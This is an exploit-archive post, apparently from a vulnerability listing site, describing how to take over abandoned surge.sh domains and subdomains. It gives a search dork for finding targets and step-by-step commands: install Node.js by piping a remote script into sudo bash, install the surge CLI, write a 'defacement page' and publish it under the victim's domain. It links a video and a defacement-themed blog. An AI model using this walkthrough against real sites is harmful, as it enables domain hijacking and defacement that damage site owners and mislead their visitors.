Surge Domain/Subdomain Takeover

2018.12.20

Security007 (ID)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:powered by surge.sh

Exploit title: Surge Domain/Subdomain Takeover 
Author : Security007
Vendor Homepage : surge.sh
Tested on : windows 10 x64
Dork : intext:powered by surge.sh


Find The target:
--> Dorking with search engine
--> Check the header status code *Note only 404 header status code are vulnerable

How to exploit this??
First:
intall nodejs
--> curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
--> sudo apt-get install -y nodejs

Second: install surge 
--> sudo npm install --global surge (if you dont't installed npm, so install it first)
make a new directory:
--> mkdir takeover
open the directory:
--> cd takeover 
make a defacement page and save as index.html:
--> nano index.html
exploit it: 
--> surge --domain target.com 

Video :
https://youtu.be/-i6cQuluXbY

Referencje:

https://youtu.be/-i6cQuluXbY

https://defacementsec007.blogspot.com/2018/12/surge-domainsubdomain-take-over.html

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Surge Domain/Subdomain Takeover

Dork: intext:powered by surge.sh

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.